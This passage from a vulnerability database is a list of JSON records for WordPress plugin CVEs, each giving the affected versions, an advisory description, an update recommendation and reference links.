version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ad9fcd1-b3a3-4711-ad23-d27c3e2091f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ad9fcd1-b3a3-4711-ad23-d27c3e2091f4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookly-responsive-appointment-booking-tool\\\/tags\\\/23.2\\\/backend\\\/modules\\\/staff\\\/resources\\\/js\\\/staff-list.js#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookly-responsive-appointment-booking-tool\\\/tags\\\/23.2\\\/backend\\\/modules\\\/staff\\\/resources\\\/js\\\/staff-list.js#L44\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4984","slug":"wordpress-seo","versionImpact":"22.6","versionEndExcluding":"22.7","description":"The Yoast SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018display_name\u2019 author meta in all versions up to, and including, 22.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 22.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59bcd246-ca2f-4336-9a6e-89afe873ed25?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59bcd246-ca2f-4336-9a6e-89afe873ed25?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/Yoast\\\/wordpress-seo\\\/pull\\\/21334\",\"name\":\"https:\\\/\\\/github.com\\\/Yoast\\\/wordpress-seo\\\/pull\\\/21334\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079234\\\/wordpress-seo\\\/trunk\\\/src\\\/presenters\\\/slack\\\/enhanced-data-presenter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079234\\\/wordpress-seo\\\/trunk\\\/src\\\/presenters\\\/slack\\\/enhanced-data-presenter.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/developer.yoast.com\\\/changelog\\\/yoast-seo\\\/22.7\\\/\",\"name\":\"https:\\\/\\\/developer.yoast.com\\\/changelog\\\/yoast-seo\\\/22.7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5105","slug":"nmedia-user-file-uploader","versionImpact":"22.5","versionEndExcluding":"22.6","description":"The Frontend File Manager Plugin WordPress plugin before 22.6 has a vulnerability that allows an Editor+ user to bypass the file download logic and download files such as `wp-config.php`","recommendation":"Update to version 22.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d40c7108-bad6-4ed3-8539-35c0f57e62cc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d40c7108-bad6-4ed3-8539-35c0f57e62cc\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4041","slug":"wordpress-seo","versionImpact":"22.5","versionEndExcluding":"22.6","description":"The Yoast SEO plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via URLs in all versions up to, and including, 22.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 22.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078555\\\/wordpress-seo\\\/trunk#file129\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078555\\\/wordpress-seo\\\/trunk#file129\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-seo\\\/trunk\\\/inc\\\/class-wpseo-admin-bar-menu.php#L601\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-seo\\\/trunk\\\/inc\\\/class-wpseo-admin-bar-menu.php#L601\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-seo\\\/trunk\\\/inc\\\/class-wpseo-shortlinker.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-seo\\\/trunk\\\/inc\\\/class-wpseo-shortlinker.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-seo\\\/trunk\\\/src\\\/helpers\\\/short-link-helper.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-seo\\\/trunk\\\/src\\\/helpers\\\/short-link-helper.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-seo\\\/trunk\\\/src\\\/helpers\\\/short-link-helper.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-seo\\\/trunk\\\/src\\\/helpers\\\/short-link-helper.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e04b161-3cd0-454d-869c-56f42bd8afb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e04b161-3cd0-454d-869c-56f42bd8afb0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5209","slug":"bookly-responsive-appointment-booking-tool","versionImpact":"22.4.1","versionEndExcluding":"22.5","description":"The WordPress Online Booking and Scheduling Plugin WordPress plugin before 22.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 22.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dea6077a-81ee-451f-b049-3749a2252c88\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dea6077a-81ee-451f-b049-3749a2252c88\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4691","slug":"bookly-responsive-appointment-booking-tool","versionImpact":"22.3.1","versionEndExcluding":"22.4","description":"The WordPress Online Booking and Scheduling Plugin WordPress plugin before 22.4 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin","recommendation":"Update to version 22.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5085ec75-0795-4004-955d-e71b3d2c26c6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5085ec75-0795-4004-955d-e71b3d2c26c6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7306","slug":"nmedia-user-file-uploader","versionImpact":"21.5","versionEndExcluding":"22.0","description":"The Frontend File Manager Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the wpfm_delete_multiple_files() function in all versions up to, and including, 21.5. This makes it possible for unauthenticated attackers to delete arbitrary posts.","recommendation":"Update to version 22.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2912124\\\/nmedia-user-file-uploader\\\/trunk\\\/inc\\\/files.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2912124\\\/nmedia-user-file-uploader\\\/trunk\\\/inc\\\/files.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abf422ce-fa03-4bed-a4ec-b31d36de7633?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abf422ce-fa03-4bed-a4ec-b31d36de7633?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1159","slug":"bookly-responsive-appointment-booking-tool","versionEndExcluding":"21.8","description":"The Bookly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via service titles in versions up to, and including, 21.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with administrative privileges to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2913570%40bookly-responsive-appointment-booking-tool&new=2913570%40bookly-responsive-appointment-booking-tool&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2913570%40bookly-responsive-appointment-booking-tool&new=2913570%40bookly-responsive-appointment-booking-tool&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4cdf774-c93b-4b94-85ba-aa56bf401873?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4cdf774-c93b-4b94-85ba-aa56bf401873?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0865","slug":"woocommerce-multiple-customer-addresses","versionEndExcluding":"21.7","description":"The WooCommerce Multiple Customer Addresses & Shipping WordPress plugin before 21.7 does not ensure that the address to add\/update\/retrieve\/delete and duplicate belong to the user making the request, or is from a high privilege users, allowing any authenticated users, such as subscriber to add\/update\/duplicate\/delete as well as retrieve addresses of other users.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e39c0171-ed4a-4143-9a31-c407e3555eec\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e39c0171-ed4a-4143-9a31-c407e3555eec\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1487","slug":"contest-gallery","versionImpact":"21.3.0","versionEndExcluding":"21.3.1","description":"The Photos and Files Contest Gallery WordPress plugin before 21.3.1 does not sanitize and escape some parameters, which could allow users with a role as low as author to perform Cross-Site Scripting attacks.","recommendation":"Update to version 21.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c028cd73-f30a-4c8b-870f-3071055f0496\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c028cd73-f30a-4c8b-870f-3071055f0496\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-24887","slug":"contest-gallery","versionEndExcluding":"21.2.9","description":"Cross-Site Request Forgery (CSRF) vulnerability in Contest Gallery Photos and Files Contest Gallery \u2013 Contact Form, Upload Form, Social Share and Voting Plugin for WordPress.This issue affects Photos and Files Contest Gallery \u2013 Contact Form, Upload Form, Social Share and Voting Plugin for WordPress: from n\/a through 21.2.8.4.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contest-gallery\\\/wordpress-photos-and-files-contest-gallery-plugin-21-2-8-4-csrf-leading-to-gallery-creation-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contest-gallery\\\/wordpress-photos-and-files-contest-gallery-plugin-21-2-8-4-csrf-leading-to-gallery-creation-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5307","slug":"contest-gallery","versionEndExcluding":"21.2.8.1","description":"The Photos and Files Contest Gallery WordPress plugin before 21.2.8.1 does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks via certain headers.","recommendation":"Update to version 21.2.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-5307-photos-and-files-contest-gallery-contact-form-21-2-8-1-unauthenticated-stored-xss-via-http-headers\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-5307-photos-and-files-contest-gallery-contact-form-21-2-8-1-unauthenticated-stored-xss-via-http-headers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6fac1e09-21ab-430d-b56d-195e7238c08c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6fac1e09-21ab-430d-b56d-195e7238c08c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13657","slug":"store-locator-widget","versionImpact":"2025r1","versionEndExcluding":"2025r2","description":"The Store Locator Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'storelocatorwidget' shortcode in all versions up to, and including, 20200131 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2025r2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-locator-widget\\\/trunk\\\/store-locator-widget.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-locator-widget\\\/trunk\\\/store-locator-widget.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c65b6793-42e3-40cb-a6fe-b000c879d41f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c65b6793-42e3-40cb-a6fe-b000c879d41f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2874","slug":"user-submitted-posts","versionImpact":"20241026","versionEndExcluding":"20250327","description":"The User Submitted Posts \u2013 Enable Users to Submit Posts from the Front End plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 20240319 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 20250327, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3263067%40user-submitted-posts&new=3263067%40user-submitted-posts&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3263067%40user-submitted-posts&new=3263067%40user-submitted-posts&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b212a1a-0e2b-4327-93b5-398bd7a36b5c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b212a1a-0e2b-4327-93b5-398bd7a36b5c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12716","slug":"simple-basic-contact-form","versionImpact":"20240511","versionEndExcluding":"20250114","description":"The Simple Basic Contact Form WordPress plugin before 20250114 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 20250114, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9fa48f1-d7fd-4968-a122-937803f186a2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9fa48f1-d7fd-4968-a122-937803f186a2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8089","slug":"advanced-iframe","versionImpact":"2025.6","versionEndExcluding":"2025.7","description":"The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'additional' parameter in version less than, or equal to, 2025.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2025.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/advanced-iframe.php#L1831\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/advanced-iframe.php#L1831\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3344404%40advanced-iframe&new=3344404%40advanced-iframe&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3344404%40advanced-iframe&new=3344404%40advanced-iframe&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97985b75-6ac9-4aba-8f76-5633418e7907?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97985b75-6ac9-4aba-8f76-5633418e7907?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6987","slug":"advanced-iframe","versionImpact":"2025.5","versionEndExcluding":"2025.6","description":"The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2025.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2025.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/advanced-iframe.php#L725\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/advanced-iframe.php#L725\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-iframe.php#L419\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-iframe.php#L419\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-read-config.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-read-config.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329909\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-read-config.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329909\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-read-config.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6acb99eb-d61c-4d1f-b399-32db07c7e3e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6acb99eb-d61c-4d1f-b399-32db07c7e3e7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2815","slug":"administrator-z","versionImpact":"2025.03.24","versionEndExcluding":"2025.03.27","description":"The Administrator Z plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the adminz_import_backup() function in all versions up to, and including, 2025.03.24. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 2025.03.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3262319%40administrator-z&new=3262319%40administrator-z&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3262319%40administrator-z&new=3262319%40administrator-z&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32725074-5c62-49e0-83f9-c6cb77fb77a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32725074-5c62-49e0-83f9-c6cb77fb77a4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1440","slug":"advanced-iframe","versionImpact":"2024.5","versionEndExcluding":"2025.0","description":"The Advanced iFrame plugin for WordPress is vulnerable to unauthorized excessive creation of options on the aip_map_url_callback() function in all versions up to, and including, 2024.5 due to insufficient restrictions. This makes it possible for unauthenticated attackers to update the advancediFrameParameterData option with an excessive amount of unvalidated data.","recommendation":"Update to version 2025.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3255604%40advanced-iframe&new=3255604%40advanced-iframe&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3255604%40advanced-iframe&new=3255604%40advanced-iframe&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b92913fa-aa1e-40a0-9a48-d730b2102217?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b92913fa-aa1e-40a0-9a48-d730b2102217?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1439","slug":"advanced-iframe","versionImpact":"2024.5","versionEndExcluding":"2025.0","description":"The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2024.5 due to insufficient input sanitization and output escaping on user supplied attributes through the 'src' attribute when the src supplied returns a header with an injected value . This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2025.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3255604%40advanced-iframe&new=3255604%40advanced-iframe&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3255604%40advanced-iframe&new=3255604%40advanced-iframe&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ac1145b-5ab1-47a9-9117-4870c52a70fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ac1145b-5ab1-47a9-9117-4870c52a70fc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1437","slug":"advanced-iframe","versionImpact":"2024.5","versionEndExcluding":"2025.0","description":"The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2024.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2025.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3255604%40advanced-iframe&new=3255604%40advanced-iframe&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3255604%40advanced-iframe&new=3255604%40advanced-iframe&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/676b4768-98ea-4e55-87de-ef7ae1d7a113?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/676b4768-98ea-4e55-87de-ef7ae1d7a113?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5002","slug":"user-submitted-posts","versionImpact":"20240319","versionEndExcluding":"20240516","description":"The User Submitted Posts  WordPress plugin before 20240516 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 20240516, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da09b99a-fa40-428f-80b4-0af764fd2f4f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da09b99a-fa40-428f-80b4-0af764fd2f4f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4144","slug":"simple-basic-contact-form","versionImpact":"20240502","versionEndExcluding":"20240511","description":"The Simple Basic Contact Form plugin for WordPress for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 20240502. This allows unauthenticated attackers to execute arbitrary shortcodes. The severity and exploitability depends on the functionality of other plugins installed in the environment.","recommendation":"Update to version 20240511, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ded1944f-662d-4d25-8277-4b1dc63b2144?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ded1944f-662d-4d25-8277-4b1dc63b2144?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-basic-contact-form\\\/trunk\\\/simple-basic-contact-form.php#L543\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-basic-contact-form\\\/trunk\\\/simple-basic-contact-form.php#L543\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085036\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085036\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4150","slug":"simple-basic-contact-form","versionImpact":"20221201","versionEndExcluding":"20240502","description":"The Simple Basic Contact Form plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018scf_email\u2019 parameter in versions up to, and including, 20221201 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 20240502, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080540\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080540\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-basic-contact-form\\\/trunk\\\/simple-basic-contact-form.php#L122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-basic-contact-form\\\/trunk\\\/simple-basic-contact-form.php#L122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22074d7a-5dbd-4a0c-bc5d-e4c983e5edb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22074d7a-5dbd-4a0c-bc5d-e4c983e5edb4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
